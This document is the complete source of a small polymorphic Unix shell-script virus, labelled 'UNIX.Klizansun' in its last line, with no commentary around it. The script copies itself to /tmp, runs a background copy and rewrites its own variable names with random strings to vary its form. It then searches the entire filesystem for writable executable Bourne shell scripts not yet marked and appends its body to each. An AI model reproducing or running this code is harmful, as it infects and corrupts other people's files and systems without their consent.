#!/bin/sh
rem ----------------------------------------------------------------------------------------------
rem ----------------------------------------------------------------------------------------------

tail -n 29 $0 > /tmp/hlfZ; tail -n 27 $0 > /tmp/kSLjKXgXY
chmod 755 /tmp/kSLjKXgXY; (/tmp/kSLjKXgXY &); exit 0
hgiDo () {
sed s/$1/$2/g /tmp/hlfZ > /tmp/IIcOir; cp /tmp/IIcOir /tmp/hlfZ }
FKb () {
vRxVgSr=`expr $(($RANDOM % $(($2 - $1)))) + $1`
RANDOM=$RANDOM
return $vRxVgSr }
hVcpKILlcl="hVcpKILlcl hlfZ kSLjKXgXY vRxVgSr uSNjUnKTwC LVcFaVgh hgiDo IIcOir FKb XlRJ vMY"
for XlRJ in $hVcpKILlcl ; do
FKb 3 15
uSNjUnKTwC=$?
while [ $uSNjUnKTwC -gt 0 ] ; do
FKb 65 122
vMY=$?
if ! [ $vMY -gt 90 -a $vMY -lt 97 ] ; then
LVcFaVgh=$LVcFaVgh`echo -e '\'$(printf %o $vMY)`
uSNjUnKTwC=`expr $uSNjUnKTwC - 1`
fi; done
hgiDo $XlRJ $LVcFaVgh
LVcFaVgh=""; done
find / -type f -perm +111 -exec bash -c \
"if [ ! -d {} ] && [ -z \"\`grep -s Klizansun {}\`\" -a -x {} -a -w {} ] ; then
if [ -n \"\`file {} | grep Bourne\`\" ] ; then
echo >> {} 
cat /tmp/hlfZ >> {}
fi; fi" \;
rm /tmp/kSLjKXgXY; rm /tmp/hlfZ; rm /tmp/IIcOir
: UNIX.Klizansun